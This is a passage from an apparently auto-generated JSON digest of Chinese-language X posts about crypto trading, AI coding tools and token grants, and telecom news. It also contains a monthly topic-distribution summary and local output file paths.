@chuxiaeth: 比特币橙子哥的推是 @oragnes 原推有误\n[原文链接](https://x.com/chuxiaeth/status/2049043685094907944)\n\n**[2026-04-28T08:25:44+00:00]**\n> 《Cursor 官方扶持的 AI & Web3 创作者名录》 @cursor_ai 作为顶尖的 AI 项目,最近筛选了 15 位中文区优质博主,给予了价值一万美元的 Token 激励。如果深入了解这个圈子的行情,就会知道这份名单的分量确实不低。 以下是这 15 位获得资助的创作者及其核心画像(顺序随机): 1. Jason Zhu @GoSailGlobal 独立开发者,主要分享 SaaS 出海…\n[原文链接](https://x.com/chuxiaeth/status/2049042369530777747)\n\n**[2026-04-26T23:40:41+00:00]**\n> - @RiverdotInc 第五季创作者排名战正式打响🏆 赛季时间:4月22日 → 26年Q2结束📅 这一季的主题就是 RIVER 质押 + 合作活动,我也会继续在现场肝建设🛠️ 另外,第四季空投会在结算完成后开放领取🪂,别忘了蹲 @River4fun 💧 我也已经加入到第五季的战斗\n[原文链接](https://x.com/chuxiaeth/status/2048547844982976544)\n\n**[2026-04-26T23:33:15+00:00]**\n> - @ferra_protocol 居然也上贵金属永续合约了🥇 现在是个项目都在往链上合约赛道挤🔗,蛋糕基本被分干净了 如果你是 SUI 链老玩家,又对贵金属合约有执念,可以多蹲蹲 #Ferra,这也是我捂了很久一直在撸的项目💰 交互链接: https://ferra.ag?code=tBYQfU0aq 进去直接点 Perpetuals 就能开搞⚡️ #DEXonSui 🚀\n[原文链接](https://x.com/chuxiaeth/status/2048545974747070599)\n\n**[2026-04-26T02:36:06+00:00]**\n> 好久不见,宝子们,近来可好啊\n[原文链接](https://x.com/chuxiaeth/status/2048229604784308266)\n\n---\n\n### ⚠️ @二级炒家 — 二级炒家(获取失败)\n\n- 错误: invalid_handle_for_nitter\n\n### ✅ @wolfyxbt — 杀破狼(18 条)\n\n**[2026-04-27T13:59:57+00:00]**\n> 最近想玩链游的可以看看 @RealGoOfficial 这个游戏 他们刚刚拿到了 350w 美金融资,这个行情能融到这个数字算很不错了。苹果商店和谷歌商店现在都可以下载,玩法类似 Pokemon GO,出门走路到现实世界抓 Meme 宠物,然后收集、升级、融合、组队、社交。 他们提出 Meme 3.0 的概念,想去做一些 Meme 相关的生态基建,现在和几个 Meme 的大 IP 都有合作,比如…\n[原文链接](https://x.com/wolfyxbt/status/2048764088193569049)\n\n**[2026-04-27T01:55:58+00:00]**\n> 不要骂我了,山寨季已经来过了 $TRUMP 发币前后就是山寨季,就是本轮牛市山寨币流动性最充沛的时间段。 觉得没来的,大部分是自己没赚到钱,我觉得要反省一下,不反省的话,下一轮山寨季也大概率賺不到钱。 山寨币是赚钱容易而已,不是所有人都赚钱。\n[原文链接](https://x.com/wolfyxbt/status/2048581892333867398)\n\n**[2026-04-26T04:01:04+00:00]**\n> 嗨 @nikitabier @elonmusk 你们两个,能不能快点解决这个问题,你们的检测机制,把我一堆活人朋友们都误封了,然后这些真正的机器人账号,我每一次发帖都会出现。 我真的球球你们了,去追踪这几个关键词就可以了:男大、弟弟、同城、哥哥、万达广场、线下、主人、搭子、固炮、单男。\n[原文链接](https://x.com/wolfyxbt/status/2048250984644960630)\n\n**[2026-04-26T02:11:07+00:00]**\n> 卧槽,川普又被枪击了 😱\n[原文链接](https://x.com/wolfyxbt/status/2048223317019316568)\n\n**[2026-04-25T15:08:21+00:00]**\n> 因为上帝造人的时候,是把生殖器设计给你们繁殖的,不是设计给你们进食的。\n[原文链接](https://x.com/wolfyxbt/status/2048056527731454048)\n\n**[2026-04-25T13:32:07+00:00]**\n> R to @wolfyxbt: Image\n[原文链接](https://x.com/wolfyxbt/status/2048032308637442215)\n\n**[2026-04-25T13:30:27+00:00]**\n> 2019 年,孙哥放了巴菲特的鸽子; 2026 年,嗯哼放了特朗普的鸽子。 币圈真是个神奇的地方!\n[原文链接](https://x.com/wolfyxbt/status/2048031889789972748)\n\n**[2026-04-25T10:03:02+00:00]**\n> 虽然比特币回到 77,000 了,但是我还是非常悲观的 我理想中的抄底价格是 35,000 的比特币 感觉现在币圈虽然看起来一片欣欣向荣,但是更像是虚假繁荣,拉盘的全是一些强控筹的山寨币和小市值的 Meme,主流币除了 $BTC 和 $ETH 稍微涨了一点,其他大市值的山寨比如 $DOGE 和 $SOL 根本涨都涨不动。 这种底我根本不敢抄呀,抄在半山腰至少得难受一年。 感觉现在这种行情像是跌太…\n[原文链接](https://x.com/wolfyxbt/status/2047979690623955107)\n\n**[2026-04-25T08:01:04+00:00]**\n> 我靠 Cursor 刚刚送了我 10,000 美金的额度! 感谢 @cursor_ai @edwinarbus 的恩赐,这周马上回归使用 Cursor!\n[原文链接](https://x.com/wolfyxbt/status/2047948998250840240)\n\n**[2026-04-25T05:22:04+00:00]**\n> 我过去 2 周的总曝光量是 1320 万,收益是 1799.75 美金。 平均算下来,每 1 次曝光有 0.000136 美金的收益; 每 1 万次曝光 1.36 美金的收益。\n[原文链接](https://x.com/wolfyxbt/status/2047908983101628720)\n\n**[2026-04-25T03:15:14+00:00]**\n> R to @wolfyxbt: 为了利于大家分析,这里发一下我自己的后台数据\n[原文链接](https://x.com/wolfyxbt/status/2047877064104284194)\n\n**[2026-04-25T02:27:20+00:00]**\n> 卧槽!牛逼牛逼! 这两周的工资涨到了 1799 美金! Thank you Elon Musk!\n[原文链接](https://x.com/wolfyxbt/status/2047865010182148284)\n\n**[2026-04-24T13:29:31+00:00]**\n> 我也很爱吃瓜,但我觉得还是得理性吃瓜 昨天 Tron 上面有 3.44 亿的 $USDT 被 Tether 冻结了,有人说这是川普家族开始对孙哥进行打压了,但是这些钱跟孙哥和 Tron 基金会根本没有一点关系 😂 这些钱是柬埔寨参议员 Kok An 相关的一些资金,因为涉及了东南亚杀猪盘、网络诈骗和人口贩卖等等的犯罪,所以才被美国执法机构申请冻结了。 Tether 一直以来都会联合美国的执法机构…\n[原文链接](https://x.com/wolfyxbt/status/2047669267475419273)\n\n**[2026-04-24T07:56:02+00:00]**\n> SBF 的投资水平:Anthropic、Cursor、SpaceX CZ 的投资水平:SBF\n[原文链接](https://x.com/wolfyxbt/status/2047585341515993543)\n\n**[2026-04-24T03:56:02+00:00]**\n> 看到此推的所有人,现在立刻马上推荐我一个生活好物。\n[原文链接](https://x.com/wolfyxbt/status/2047524944280793505)\n\n**[2026-04-23T13:02:03+00:00]**\n> 福利姬宝宝们,快点出来, 集合了,来这个评论区集合,我有重要事情要宣布。\n[原文链接](https://x.com/wolfyxbt/status/2047299964158787623)\n\n**[2026-04-23T12:07:53+00:00]**\n> 有时候真的很敬佩打狗的 P 小将 你只要经常去扫链,先不说能不能赚钱,但你绝对能看到这个行业内最快最早的信息源(排除一些内部人士能提前知道的信息)。很多都是一些官方都还没发布的东西、还没上线的产品,或者是一些藏在文档和代码里的蛛丝马迹,都能给这些 P 小将给提前扒出来发个币。\n[原文链接](https://x.com/wolfyxbt/status/2047286333505515554)\n\n**[2026-04-22T10:01:10+00:00]**\n> Macbook 的默认文件夹太丑了 而且每个都长得一样,每次找起来都不太方便,我发现这个文件夹样式是可以自定义的,所以刚刚 Vibe 了一个可以给 Macbook 文件夹自定义样式的小工具,大家也可以用用 👇 • 网站:https://wolfyxbt.github.io/iFolder 这样看起来舒服多了,每次找起来也比较方便。\n[原文链接](https://x.com/wolfyxbt/status/2046892058909331482)\n\n---\n\n### ✅ @runes_leo — Leo(19 条)\n\n**[2026-04-29T08:16:00+00:00]**\n> 刚学习完罗福莉老师这场 3.5h 访谈发了中文解读, 转头就刷到她团队在送 100T tokens grant,立马提交申请。 表单做得对中文 builder 极友好: 工具栏 OpenClaw / Claude Code / Codex 排前三 模型可勾 Claude / MiMo / DeepSeek / 豆包 / MiniMax 等国产 下一步:把 MiMo V2.5 接进现有 Claud…\n[原文链接](https://x.com/runes_leo/status/2049402305217241384)\n\n**[2026-04-29T06:15:09+00:00]**\n> x.com/i/article/204902031072…\n[原文链接](https://x.com/runes_leo/status/2049371895267774715)\n\n**[2026-04-29T02:16:00+00:00]**\n> 群里讨论开源 bot,多数人共识就一句话:赚钱的 bot 没人会开源。 听着像废话,但这个常识在 AI 时代变得尖锐—— 以前护城河是\"代码会写\"。现在 github 丢给 AI,几秒钟读完整个架构。重写成本从两个月变成两小时。 护城河从\"代码会写\"变成\"策略会想\"。 这件事我自己也在分层做—— polymarket-toolkit 我开源(仓库https://github.com/runesl…\n[原文链接](https://x.com/runes_leo/status/2049311708330459226)\n\n**[2026-04-28T23:38:00+00:00]**\n> 之前一直没搞清楚 GitHub 通知是怎么工作的。Star / Watch 各档到底推什么?摸清楚才发现很多人(包括我)一直在误解:star 根本不触发通知。 - Star ⭐ = 书签,零通知 - Watch (All Activity) = issue / PR / release / discussion / commit 评论,但单纯 push 不推 - Watch (Releases …\n[原文链接](https://x.com/runes_leo/status/2049271946022474215)\n\n**[2026-04-28T19:30:02+00:00]**\n> vision pro 连 mac 开带鱼屏,Polymarket 盯赔率变化,Codex 跑策略代码,再开个窗口看直播,get 到了新的看球姿势,提前为世界杯做准备😂\n[原文链接](https://x.com/runes_leo/status/2049209546091253870)\n\n**[2026-04-28T14:27:57+00:00]**\n> 升级了自己的 AI 视频管线把这个文字内容重做成 46 秒竖屏视频版。 全自动化 pipeline 操作的。大家觉得怎么样👀 之前开源的 claude-video-kit 详情见 https://x.com/runes_leo/status/2041395548234944600\n[原文链接](https://x.com/runes_leo/status/2049133521919484102)\n\n**[2026-04-28T12:23:41+00:00]**\n> 恭喜你们有职业定位了:AI 包工头 Agent Operator,未来 5 年每家公司都会需要的新岗位?说人话就是 AI 包工头——专门编排 AI agent 干活,核心 5 项技能:MCP / CLI / skills.md / AGENTS.md / 业务嗅觉。 但这不是新职业,是没起名字而已😆 翻了下自己这半年攒的工作流,他列的每一条都对得上号。中文圈靠 Claude Code 自己搭流程…\n[原文链接](https://x.com/runes_leo/status/2049102248719052964)\n\n**[2026-04-28T10:18:07+00:00]**\n> 从 Claude 转向 Codex 的越来越多了 我也有同感 没 100% 切到 Codex 是因为我还在双轨用: CC 写日常对话+内容/工具代码+工作流编排,Codex 做策略/数据代码+独立 review+verify。 两边各有强项,先一起用着看看👀\n[原文链接](https://x.com/runes_leo/status/2049070650481066377)\n\n**[2026-04-28T09:16:38+00:00]**\n> 本来要明天才能刷新的 codex 额度,突然又被提前重置了一轮 Codex 这点真有意思呀 周额度按理说 7 天一刷新,实际上隔几天就偷偷给你重置一次。 这到底是营销策略还是什么骚操作\n[原文链接](https://x.com/runes_leo/status/2049055175906931184)\n\n**[2026-04-28T08:16:00+00:00]**\n> Leo Labs 大群 4-28 群友讨论精华(最近 584 条) V2 cutover 5 小时后正式生效,群里这一天聊到的 4 件事记下来。 ━━━━━━━━━━━━ 1️⃣ V2 EOA 已实测可跑,但 redeem 路径有坑 • 4/27 上午有人 EOA 实盘 4h ≈ $20(V2 endpoint 已下单成功) • redeem 回来是 USDC.e,不是 pUSD,要交易得再 w…\n[原文链接](https://x.com/runes_leo/status/2049039917494231397)\n\n**[2026-04-28T06:39:23+00:00]**\n> R to @runes_leo: youtube.com/watch?v=6eBSHbLK…\n[原文链接](https://x.com/runes_leo/status/2049015605710491995)\n\n**[2026-04-28T06:39:23+00:00]**\n> 最近 X 上无数次刷到 @bcherny (Claude Code 作者)的演讲《Mastering Claude Code in 30 minutes》(30 分钟用好 Claude Code)——溯源才发现,其实是一年前的内容。 两点感受: - 好内容生命力是真长,一年了依然有这种传播力 - 大家对\"怎么用好 AI\"的方法论焦虑,在数据上肉眼可见 前两天我专门做了个中文字幕版,有需要的可以看…\n[原文链接](https://x.com/runes_leo/status/2049015602073989130)\n\n**[2026-04-28T06:01:37+00:00]**\n> R to @runes_leo: 第4章:跑了几个月策略,回头对 PnL 报表觉得不对劲。 拉链上记账对账了一下,发现 18.3% 的成交根本没进 DB。 亏的钱是真亏,但赚的那部分里有一截根本没发生过——我自己的报表在骗自己。 要不要也拉一遍你自己的对账? https://x.com/runes_leo/status/2049004801078300881?s=20 ——— 付费连载 7 章里…\n[原文链接](https://x.com/runes_leo/status/2049006099173626041)\n\n**[2026-04-28T05:57:43+00:00]**\n> 跑了几个月策略,回头对 PnL 报表觉得不对劲。 拉链上记账对账了一下,发现 18.3% 的成交根本没进 DB。 亏的钱是真亏,但赚的那部分里有一截根本没发生过——我自己的报表在骗自己。 要不要也拉一遍你自己的对账? ——— 付费连载 7 章里的第 4 章。链接里有完整版 + 源码包 + 读者群,订阅 X 也可以持续追读。 https://leolabs.me/pm-quant#/pm-quant\n[原文链接](https://x.com/runes_leo/status/2049005119069667522)\n\n**[2026-04-28T04:38:00+00:00]**\n> 卧槽,不用 ChatGPT 改一遍简历就要被算法刷掉? 这条 22k 赞推文说有论文证明:AI 筛简历 97.6% 偏向 ChatGPT 改写版,GPT-4o 自偏好 97.6% / LLaMA 96.3% / DeepSeek 95.5%——原推还说 99% 大公司用 AI 筛、多数用 GPT-4o,所以你写的简历直接被算法歧视。 去 arxiv 翻了原论文(2509.00462,AAAI/A…\n[原文链接](https://x.com/runes_leo/status/2048985055842730341)\n\n**[2026-04-28T02:27:00+00:00]**\n> 看完这条想冲去把 CLAUDE.md 改长——先别。 第二条实锤同意,Anthropic 自己 system prompt 几千 tokens,让用户写短是为了它自己留空间。 但我认为「长 vs 短」不是真问题,「能否被自动加载 + 关键词 trigger」才是。 我的 setup:rules/ 自动加载 + docs/ 按场景加载 + 关键词 trigger 写在 CLAUDE.md 主文件。…\n[原文链接](https://x.com/runes_leo/status/2048952088361918479)\n\n**[2026-04-28T00:16:00+00:00]**\n> 3 周前立了个 flag:跑数据验证 4 条 Claude Code 缓存优化(/clear 改话题切换 / MEMORY.md 推迟 / 模型阶段切换 / /btw 长任务插问)。 今天等长滑窗对比 4 周。 · 命中率 96.7% → 96.3%(噪声内) · Msg/Session 118 → 137(W17 反而更长) · 4 条规则大部分是追认我本来就这样用 真正涨的不是 cache …\n[原文链接](https://x.com/runes_leo/status/2048919121115631642)\n\n**[2026-04-27T15:38:00+00:00]**\n> 刷到这条对照了一下自己的进度,他说的大半路径我正在跑,而且已经有点成果。 过去半年搭起了 http://leolabs.me 当主站,业务线一条条开: PM 策略实盘 / 付费长文 + 策略包 / 开源工具 / X 中文圈深耕 / TG 频道运营。 没雇过一个人。Codex 和 Claude 是两个学徒,多窗口当分身用。 体感最深的是第 11 条——把成果反馈给 AI 问怎么优化,循环顺到能撬出…\n[原文链接](https://x.com/runes_leo/status/2048788762646184092)\n\n**[2026-04-27T12:27:00+00:00]**\n> Linear CEO Karri Saarinen 关于 AI 的长文,难得的克制观察,没有狂热也没有唱衰。 最反直觉的是\"专家悖论\"那段:AI 在你不懂的领域像魔法,在你懂的领域你看到漏洞和破绽——越懂行的人用 AI 越累,但专业能力也越值钱,因为它从\"动手做\"挪到\"知道什么叫好\"。 \"计划无用,规划至上\"那章也好,讲规划真正的价值是逼组织对齐和决策,不在那份产出物。 值得读全文。\n[原文链接](https://x.com/runes_leo/status/2048740695461228878)\n\n---\n\n### ⚠️ @oranges — 比特币橙子(获取失败)\n\n- 错误: snscrape=snscrape_unavailable: No module named 'snscrape'; nitter=URLError: ; rsshub=HTTPError: HTTP Error 503: Service Unavailable\n\n### ✅ @realNyarime — 奶昔(20 条)\n\n**[2026-04-29T08:43:53+00:00]**\n> R to @realNyarime: 虽然原帖并未提及中国联通,但帖主在评论区提到“联通玩不起”,也害怕被运营商“穿小鞋”因此仅披露运营商未经许可入室查设备,因小区监控不全面而无法取证\n[原文链接](https://x.com/realNyarime/status/2049409325098238125)\n\n**[2026-04-29T08:41:13+00:00]**\n> 据xhs用户「A信通网络」爆料,长沙联通查PCDN,摸着窗户上的钥匙进门,前前后后来了10多个人,说是什么纪检组的和PCDN专案组的人,还有一堆智家工程师。 原文如下:我们突然收到公司的电话,说我办的业务出问题了。还以为啥大事。我赶紧跑过来,发现客户家里的门开着,以为是客户自己在家里,结果客户并不在家。 [坏笑R]前前后后来了10多个人,说是什么纪检组的和PCDN专案组的人,还有一堆智家工程师。…\n[原文链接](https://x.com/realNyarime/status/2049408651660755063)\n\n**[2026-04-29T07:15:58+00:00]**\n> 裤袜是裤子还是袜子?\n[原文链接](https://x.com/realNyarime/status/2049387196311105556)\n\n**[2026-04-29T02:54:33+00:00]**\n> RT by @realNyarime: 基于大家的评论,看来大家都想要 token,所以这次我打算这样庆祝。 关注我 @aiandcloud 并转发 + 评论这条内容,5 月 8 日开奖, 送 $100 GPT-5.5 API token,有效期两个月。 如果活动期间到了 2K fo,就再加一个 $200 的名额,万一到 3K 就加个 $300 的也行! 感谢大家的支持!🥰\n[原文链接](https://x.com/realNyarime/status/2049321411420811479)\n\n**[2026-04-29T02:39:00+00:00]**\n> 好消息:沪爷可以去金马了 坏消息:需要到福建的出入境办大通证(往来台湾通行证)和签注\n[原文链接](https://x.com/realNyarime/status/2049317496361292240)\n\n**[2026-04-29T01:15:23+00:00]**\n> 昨天试着申请了小米百万亿Token补贴,也收到了雷总送的7亿token,有效期一个月 支持OpenAI和Anthropic端点,也有提供Claude Code等AI软件接入文档,看得出MiMo团队很用心在做这个事情 接下来一个月,我会用MiMo V2.5对接OpenClaw尝试Vibe一个项目并开源,也期待国产LLM越做越好!\n[原文链接](https://x.com/realNyarime/status/2049296454905393361)\n\n**[2026-04-28T15:53:07+00:00]**\n> 最赚钱的莫过于,帮别人开Claude被封全额退款再抽个20%的水 难怪A/那么多人用,原来是全民退款流\n[原文链接](https://x.com/realNyarime/status/2049154953483370544)\n\n**[2026-04-28T14:03:32+00:00]**\n> CMLink英国卡老用户可在【无忧行英国版JegoTrip-CMLink】领20G本地流量包 另外CMLink UK下架eSIM,要求补卡要激活一个月才能补,估计是防止国内用户下单抢名额\n[原文链接](https://x.com/realNyarime/status/2049127378815942981)\n\n**[2026-04-28T10:19:02+00:00]**\n> Xiaomi MiMo V2.5包含旗舰推理模型、多模态模型和语音合成模型,MiMo API 开放平台面向全球用户提供 API 推理服务,可直接对接Claude Code、Cursor、OpenClaw等主流编程工具 还是有点期待的,如果有OpenClaw需求的同学们可以考虑提交自己的GitHub或项目官网+100字以上小作文申请 北京时间2026年4月28日至5月28日,共 30 天,赠完即止…\n[原文链接](https://x.com/realNyarime/status/2049070878961656082)\n\n**[2026-04-28T09:32:15+00:00]**\n> 是谁污染了icu后缀域名???\n[原文链接](https://x.com/realNyarime/status/2049059109258010927)\n\n**[2026-04-28T09:10:49+00:00]**\n> 中国移动CMLink UK(小移在英国)发布官方App【JegoTrip-CMLink】 由JegoTrip无忧行团队负责开发,仅提供用量、话费查询,不过也可以领免费eSIM 1)5月31日之前,下载并登录App可获得20GB英国本地流量,7个工作日内到账有效期28天 2)新用户可领取eSIM一张,此卡可在中国香港、英国及欧盟进行激活,或使用英国IP代理下拉起WiFi通话(VoWiFi)激活号卡…\n[原文链接](https://x.com/realNyarime/status/2049053713642471580)\n\n**[2026-04-28T08:44:43+00:00]**\n> 其实我最遗憾的是,帝国时代Online为什么下掉了,最怀念的是AOE2那会跟同学拿着U盘拷副本,然后在电脑课教室的局域网里面联机,回家后还用浩方周末组队 记得我最喜欢的是拜占庭,我的发小会选哥特跟我联盟,至于其他小伙伴就是按照他们的习惯选择。不过后面就都各奔东西,唯独我的世界、幻兽帕鲁这类的联机游戏又齐聚一堂 如果可以的话,还是希望这辈子能看到微软把帝国时代Online给重新上架,总感觉后来重制…\n[原文链接](https://x.com/realNyarime/status/2049047146146754812)\n\n**[2026-04-28T08:19:18+00:00]**\n> 五一节快到了,听说N卡上网最快了\n[原文链接](https://x.com/realNyarime/status/2049040750860812765)\n\n**[2026-04-28T06:55:53+00:00]**\n> 谷歌反重力家庭组不能一拖多,改成跟号主共享额度,看来Google Antigravity也被薅怕了\n[原文链接](https://x.com/realNyarime/status/2049019755336704210)\n\n**[2026-04-28T05:59:08+00:00]**\n> R to @realNyarime: 随行WiFiX配置的聚合频宽是100+100+100+90,虽然北京地铁配置的是100+60+100+60\n[原文链接](https://x.com/realNyarime/status/2049005476243993029)\n\n**[2026-04-28T05:30:05+00:00]**\n> 华为随身WiFi X目前只有移动版,机卡绑定、白名单机制仅识别移动卡,物联网卡和其他运营商都用不了 另外直播神器号卡「移动直播臻享卡」只能在这台随身WiFi上用,具体套餐及机制可参考博主「小武是我」发布的视频 感谢通信人家园「玩耍天使」提供的测试数据,在北京地铁12号线实测79C+41C 4cc载波聚合 ,或许华为定高价是为了给友商活路\n[原文链接](https://x.com/realNyarime/status/2048998165031043180)\n\n**[2026-04-28T05:06:23+00:00]**\n> 之前闲鱼95折收的号内E卡,帮我代下单。昨天派出所给我打电话,让我今天去做笔录,还问我买的东西在不在,是不是想让我退赃 于是早上8点到就到派出所做笔录,花了2个小时。和民警了解到,受害人是被骗了10多万的大润发卡,10500的京东E卡,京东E卡分别给10来个人下单,我是其中一个 笔录上把我当成刑事案件的证人,写了我买E卡的过程,提供了卖E卡人的相关信息 涉案的E卡,和我有关的只有1700多元,还…\n[原文链接](https://x.com/realNyarime/status/2048992199208251709)\n\n**[2026-04-28T01:48:44+00:00]**\n> 嗯?快连(LetsVPN)跟老王VPN不一个背景的吗\n[原文链接](https://x.com/realNyarime/status/2048942460630688174)\n\n**[2026-04-28T00:53:36+00:00]**\n> 境外组织挑动男女对立 境外组织大力资助网红煽动躺平 境外组织炮制“阶层固化”与“努力无用”论调 境外组织全方位煽动各类“社会群体对立” 境外组织利用“环保”、“动保”或“平权”等特定议题进行渗透 对,都是海外势力搞得,我们是不可能存在任何缺点的! 考公务员躺平没用,公务员是全世界最辛苦的职业,每天上24小时的班,还没下班又接着上班了\n[原文链接](https://x.com/realNyarime/status/2048928584379822356)\n\n**[2026-04-27T16:21:57+00:00]**\n> 美团旗下龙猫新模型LongCat-2.0-Preview专属额度,内测期间将根据负载情况每日不定期多次刷新,新模型限时申请👉https://longcat.chat/platform 每天1000万token额度,差不多2小时重置一下额度,使劲薅! 另外还有几个模型LongCat-Flash-Chat、 LongCat-Flash-Thinking-2601、 LongCat-Flash-Omn…\n[原文链接](https://x.com/realNyarime/status/2048799821746897247)\n\n---\n", + "monthly_analysis_md": "# X平台资讯深度分析报告\n\n**报告日期**: 2026-04-29T09:15:14.394459+00:00\n**分析账号**: 44个 | **活跃账号**: 37个 | **推文总量**: 513条\n\n---\n\n## 一、总体概览\n\n- 本报告基于 X 关注列表近30天 RSS 数据自动生成。\n- 默认口径:按账号聚合、按推文主题词粗分层。\n\n## 二、主题分布\n\n- **其他**:351 条\n- **模型能力**:114 条\n- **交易与市场**:21 条\n- **算力与芯片**:14 条\n- **投融资与并购**:13 条\n\n## 三、活跃账号 Top10\n\n- @realNyarime: 20 条\n- @berryxia: 20 条\n- @elonmusk: 20 条\n- @dingyi: 20 条\n- @paulg: 20 条\n- @sama: 20 条\n- @HarryStebbings: 20 条\n- @jason: 20 条\n- @ylecun: 20 条\n- @pmarca: 20 条\n\n## 四、代表性推文\n\n- @GoSailGlobal | 2026-04-29T09:07:13+00:00\n - 做了 2 个月的事:把 GitHub 上每一个 Claude Skill / MCP server / 开源 Agent 工具都索引下来 数据库现在 67,196 个项目 跑了一遍分布分析,结果让我自己愣了 30 秒: - 基尼系数 0.983(破 AppStore、npm、YouTube 纪录) - 54.1% 的项目是 0 star——不是「少 sta…\n - https://x.com/GoSailGlobal/status/2049415194372342164\n- @realNyarime | 2026-04-29T08:43:53+00:00\n - R to @realNyarime: 虽然原帖并未提及中国联通,但帖主在评论区提到“联通玩不起”,也害怕被运营商“穿小鞋”因此仅披露运营商未经许可入室查设备,因小区监控不全面而无法取证\n - https://x.com/realNyarime/status/2049409325098238125\n- @realNyarime | 2026-04-29T08:41:13+00:00\n - 据xhs用户「A信通网络」爆料,长沙联通查PCDN,摸着窗户上的钥匙进门,前前后后来了10多个人,说是什么纪检组的和PCDN专案组的人,还有一堆智家工程师。 原文如下:我们突然收到公司的电话,说我办的业务出问题了。还以为啥大事。我赶紧跑过来,发现客户家里的门开着,以为是客户自己在家里,结果客户并不在家。 [坏笑R]前前后后来了10多个人,说是什么纪检组的和…\n - https://x.com/realNyarime/status/2049408651660755063\n- @GoSailGlobal | 2026-04-29T08:40:25+00:00\n - R to @GoSailGlobal: 3️⃣ 可以把做的张小龙Agent拉到群组 大家可以圆桌讨论,简单易用\n - https://x.com/GoSailGlobal/status/2049408452079046944\n- @GoSailGlobal | 2026-04-29T08:40:22+00:00\n - R to @GoSailGlobal: 2️⃣ 每个agent可以GUI自定义大模型、skill、memory 还可以支持第三方模型\n - https://x.com/GoSailGlobal/status/2049408436597899361\n- @GoSailGlobal | 2026-04-29T08:40:18+00:00\n - R to @GoSailGlobal: 1️⃣ 使用google邮箱登陆 可下载本地软件(最好下载本地) or 网页版使用\n - https://x.com/GoSailGlobal/status/2049408421167005763\n- @GoSailGlobal | 2026-04-29T08:40:14+00:00\n - 被一个二维码拉进了一个 IM 内测群 群里坐着 Codex / Claude Code 实例、张小龙 agent,再加几个真人,大家一起讨论选题 agent 先梳调性,再列大纲,真人在旁边补刀 我做 AgentSkillsHub 看了 67,000+ 个 agent 项目,第一次见有人把 agent 当 IM 里的「一等公民」:不是 bot、不是插件,是好…\n - https://x.com/GoSailGlobal/status/2049408403240571320\n- @Pluvio9yte | 2026-04-29T08:20:26+00:00\n - 兄弟们,搞3D的直接冲🤩🤩🤩 Claude上线了Blender MCP连接器, 自然语言直接操控Blender的Python API, 调场景、批量改物体、写自定义工具,不用会一行代码, 我之前在Blender写个批量脚本至少折腾半小时, 现在一句话就搞定了, 更狠的是Anthropic同时砸钱加入了Blender基金会当赞助商, 这波是总共9个创意工具连…\n - https://x.com/Pluvio9yte/status/2049403423813140571\n- @runes_leo | 2026-04-29T08:16:00+00:00\n - 刚学习完罗福莉老师这场 3.5h 访谈发了中文解读, 转头就刷到她团队在送 100T tokens grant,立马提交申请。 表单做得对中文 builder 极友好: 工具栏 OpenClaw / Claude Code / Codex 排前三 模型可勾 Claude / MiMo / DeepSeek / 豆包 / MiniMax 等国产 下一步:把 …\n - https://x.com/runes_leo/status/2049402305217241384\n- @CuiMao | 2026-04-29T07:55:14+00:00\n - Deepseek好像要发多模态的了,好好睁开眼睛看看这个世界吧!\n - https://x.com/CuiMao/status/2049397079177592925\n- @CuiMao | 2026-04-29T07:44:33+00:00\n - x.com/i/article/204921670329…\n - https://x.com/CuiMao/status/2049394392776290573\n- @realNyarime | 2026-04-29T07:15:58+00:00\n - 裤袜是裤子还是袜子?\n - https://x.com/realNyarime/status/2049387196311105556\n- @CuiMao | 2026-04-29T07:09:24+00:00\n - 😄\n - https://x.com/CuiMao/status/2049385544577438121\n- @CuiMao | 2026-04-29T07:02:18+00:00\n - 哈哈。主页刷到很多小朋友拿到了字节的 offer ,恭喜啊,我当时进字节的第一天,乌云遮天,大雨滂沱,电闪雷鸣,预示着一个伟大的产品经理即将孕育而生。😎😎,加油!,每天都是 Day 1\n - https://x.com/CuiMao/status/2049383757535490257\n- @berryxia | 2026-04-29T06:32:45+00:00\n - 看别人天天发商单,还特么疯狂涨粉。 难受了☹️ 是时候,我也要让甲方爸爸来几个单了! 助我一臂之力了嘿嘿😁 在线等啊…\n - https://x.com/berryxia/status/2049376324444410138\n- @elonmusk | 2026-04-29T06:19:31+00:00\n - Cybertruck\n - https://x.com/elonmusk/status/2049372990870290940\n- @runes_leo | 2026-04-29T06:15:09+00:00\n - x.com/i/article/204902031072…\n - https://x.com/runes_leo/status/2049371895267774715\n- @elonmusk | 2026-04-29T06:05:35+00:00\n - Congrats!\n - https://x.com/elonmusk/status/2049369485459832951\n- @CuiMao | 2026-04-29T06:04:54+00:00\n - 呵呵,上个月我说雷总的模型会把价格打下来,一群人喷我懂个 p 的 AI ,今天满屏都是感谢雷总,天地良心,成年人的世界真的他妈的太现实了吧。\n - https://x.com/CuiMao/status/2049369313547800804\n- @elonmusk | 2026-04-29T06:04:42+00:00\n - RT by @elonmusk: Full circle moment: paying for @Starlink with @XMoney 🤝\n - https://x.com/elonmusk/status/2049369264914903143\n\n---\n\n*本报告由系统自动生成,供月度复盘使用。*\n", + "paths": { + "tweet_summary_md": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/推文汇总_202604.md", + "monthly_analysis_md": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/月度深度分析_202604.md" + } +} \ No newline at end of file diff --git a/data/x_brief/history/20260429_110319.json b/data/x_brief/history/20260429_110319.json new file mode 100644 index 0000000..a10e7a0 --- /dev/null +++ b/data/x_brief/history/20260429_110319.json @@ -0,0 +1,5667 @@ +{ + "generated_at": "2026-04-29T10:59:43.472886+00:00", + "report_type": "weekly", + "input": { + "watchlist_path": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/Claude_input/x资讯/简报配置.md", + "watchers": [ + { + "handle": "karpathy", + "name": "Andrej Karpathy" + }, + { + "handle": "sama", + "name": "Sam Altman" + }, + { + "handle": "DarioAmodei", + "name": "Dario Amodei" + }, + { + "handle": "AravSrinivas", + "name": "Aravind Srinivas" + }, + { + "handle": "AndrewYNg", + "name": "Andrew Ng" + }, + { + "handle": "cursor_ai", + "name": "Cursor" + }, + { + "handle": "ylecun", + "name": "Yann LeCun" + }, + { + "handle": "JeffDean", + "name": "Jeff Dean" + }, + { + "handle": "soumithchintala", + "name": "Soumith Chintala" + }, + { + "handle": "gregbrockman", + "name": "Greg Brockman" + }, + { + "handle": "GaryMarcus", + "name": "Gary Marcus" + }, + { + "handle": "elonmusk", + "name": "Elon Musk" + }, + { + "handle": "paulg", + "name": 